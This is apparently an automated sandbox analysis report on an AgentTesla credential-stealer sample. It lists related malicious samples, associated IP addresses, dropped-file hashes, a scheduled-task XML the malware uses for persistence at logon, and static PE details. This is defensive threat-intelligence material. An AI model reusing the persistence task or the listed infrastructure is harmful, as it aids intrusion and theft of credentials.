                                            SecuriteInfo.com.Win32.CrypterX-gen.1573.32091.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.222.226.100
                                            SCAN_INCORRECT_DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.222.226.100
                                            SecuriteInfo.com.Heur.26171.30744.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.222.226.100
                                            INVOICE_FEB-888201-2024.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.222.226.100
                                            INVOICE_FEB-888201-2024.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.222.226.100
                                            PURCHASE ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.222.226.100

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            PUBLIC-DOMAIN-REGISTRYUSFsd5TmAZfy.exeGet hashmaliciousAgentTeslaBrowse
                                            • 208.91.198.143
                                            SHIPPING ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.222.226.100
                                            MV SUN OCEAN BUNKER INV.docGet hashmaliciousAgentTeslaBrowse
                                            • 208.91.199.224
                                            ReInquiry Lenght Error.exeGet hashmaliciousAgentTeslaBrowse
                                            • 208.91.199.223
                                            ES502900012.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 208.91.199.224
                                            April 2024 order Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 208.91.198.143
                                            TT Invoice copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 208.91.198.143
                                            MT103.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 208.91.198.143
                                            SecuriteInfo.com.Win32.PWSX-gen.22951.7290.exeGet hashmaliciousAgentTeslaBrowse
                                            • 208.91.199.224
                                            Transmiison Remit.exeGet hashmaliciousAgentTeslaBrowse
                                            • 208.91.199.224

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.log

                                            Download File
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1415
                                            Entropy (8bit):5.352427679901606
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                            MD5:97AD91F1C1F572C945DA12233082171D
                                            SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                            SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                            SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TuZRpLi.exe.log

                                            Download File
                                            Process:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1415
                                            Entropy (8bit):5.352427679901606
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                            MD5:97AD91F1C1F572C945DA12233082171D
                                            SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                            SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                            SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                            Malicious:false
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):2232
                                            Entropy (8bit):5.380046556058007
                                            Encrypted:false
                                            SSDEEP:48:tWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//Z+Uyus:tLHxv2IfLZ2KRH6OugIs
                                            MD5:C80AC96165DD515A357403AA6D328CF5
                                            SHA1:56FE53F489E253A986A00ED2BFE3717E2E412556
                                            SHA-256:7EA260474B8CDB1C28681D53257667C27A4F71734C56D90171E026E13DDD046E
                                            SHA-512:0BFC11C77E834B5639337E10CA0A67865955151BC09C24C86F0501DCC470AA6F7656E5DBEA880B187C66F62FA28397E7AD268B9454138CBD847C44379F82298D
                                            Malicious:false
                                            Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0lwbqdre.uve.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tfcengo.wgz.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehiub1nf.313.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iil0f4l3.ubj.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_plnsx4bx.3fi.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmhydixq.seg.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yghu55vp.4ez.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yi1lgond.khz.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\tmp8319.tmp

                                            Download File
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1580
                                            Entropy (8bit):5.100200963766607
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtYxvn:cgergYrFdOFzOzN33ODOiDdKrsuT4v
                                            MD5:5D8F3EF7A0B480456E6E685130DA710F
                                            SHA1:F6F8DC77A2F4E04AA747198C447FD5ABAEE4626A
                                            SHA-256:5239272B334BCA0D8F3FE4A4F01604DDABD179BBF584F5B0B895328E014B709A
                                            SHA-512:9F0EC0CCFAA008FEB119D30E2E7FB72EAA4BC763BCFB0B12892905FCE335DD491D009530FBA81095CA2A4B552BA9E4487C58B940BB412D8487216DE4E9BB37E2
                                            Malicious:true
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                            C:\Users\user\AppData\Local\Temp\tmp9170.tmp

                                            Download File
                                            Process:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1580
                                            Entropy (8bit):5.100200963766607
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtYxvn:cgergYrFdOFzOzN33ODOiDdKrsuT4v
                                            MD5:5D8F3EF7A0B480456E6E685130DA710F
                                            SHA1:F6F8DC77A2F4E04AA747198C447FD5ABAEE4626A
                                            SHA-256:5239272B334BCA0D8F3FE4A4F01604DDABD179BBF584F5B0B895328E014B709A
                                            SHA-512:9F0EC0CCFAA008FEB119D30E2E7FB72EAA4BC763BCFB0B12892905FCE335DD491D009530FBA81095CA2A4B552BA9E4487C58B940BB412D8487216DE4E9BB37E2
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                            C:\Users\user\AppData\Roaming\TuZRpLi.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):702976
                                            Entropy (8bit):7.914385268556918
                                            Encrypted:false
                                            SSDEEP:12288:FrMrr9rr3owmyqJgA1XzGDWUPh//2dJaDiY4TynUF1wzn68c0BBQXd6Zu3q:MoZwANziVR2dJaDiFTz6vB2XdWu3q
                                            MD5:78F627ADD2CCDD0F16400418E5F829B8
                                            SHA1:013AAC15AD0A20AF80EB1F86CDF27E6159C7AC9B
                                            SHA-256:7ABD4B1C93D30C7AB8F817EBCF83262950131614590C9B254F05449EC493818C
                                            SHA-512:7A867A55AD53C928607D0235E2EAB1C47769A948EF1FB3EB13C21A22EDE80003D364FE1675E041DDB4F86EA0BBB614092F503FBC25A43FD16DA5C5F1E18457A3
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 18%
                                            • Antivirus: Virustotal, Detection: 30%, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........;...............................................................0..A....... .........%.Q...(.....R... .........%.m...(.....n...(3...*.....&*...B... ....(......*....0..............,.".".#..(....+...*..0...............".".#. ....(....+...*...0...............".".#...(....+...*..0...................... ....(....+...*..0..+.....................(P...+....s....}......j}....*..0............{......*...0..Q..........E.... ...........+... .............{.....(h.......,...+..+...

                                            C:\Users\user\AppData\Roaming\TuZRpLi.exe:Zone.Identifier

                                            Download File
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:false
                                            Preview:[ZoneTransfer]....ZoneId=0

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.914385268556918
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            File name:SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            File size:702'976 bytes
                                            MD5:78f627add2ccdd0f16400418e5f829b8
                                            SHA1:013aac15ad0a20af80eb1f86cdf27e6159c7ac9b
                                            SHA256:7abd4b1c93d30c7ab8f817ebcf83262950131614590c9b254f05449ec493818c
                                            SHA512:7a867a55ad53c928607d0235e2eab1c47769a948ef1fb3eb13c21a22ede80003d364fe1675e041ddb4f86ea0bbb614092f503fbc25a43fd16da5c5f1e18457a3
                                            SSDEEP:12288:FrMrr9rr3owmyqJgA1XzGDWUPh//2dJaDiY4TynUF1wzn68c0BBQXd6Zu3q:MoZwANziVR2dJaDiFTz6vB2XdWu3q
                                            TLSH:56E41308E6BC1A01D19E8B79E45225540376D586D053FF1F7CA45CFA0F2BBC886A4DEB
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@................................

                                            File Icon

                                            Icon Hash:9931c5b98687b385

                                            Static PE Info

                                            General

                                            Entrypoint:0x4abe0e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x661F11E1 [Wed Apr 17 00:03:45 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xabdb80x53.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x1600.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xa9e140xaa000f1356e1b079b89e15d8d815975dbb55aFalse0.942721737132353data7.924266151976974IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xac0000x16000x1600bf55757ae04241652371a2891022f3ccFalse0.734375data6.524687955793061IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xae0000xc0x200bfa2b73b478e64d53cf1eb23d152e7ceFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xac0c80xf5dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9125349605898805
                                            RT_GROUP_ICON0xad0380x14data1.05
                                            RT_VERSION0xad05c0x3c0data0.4510416666666667

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
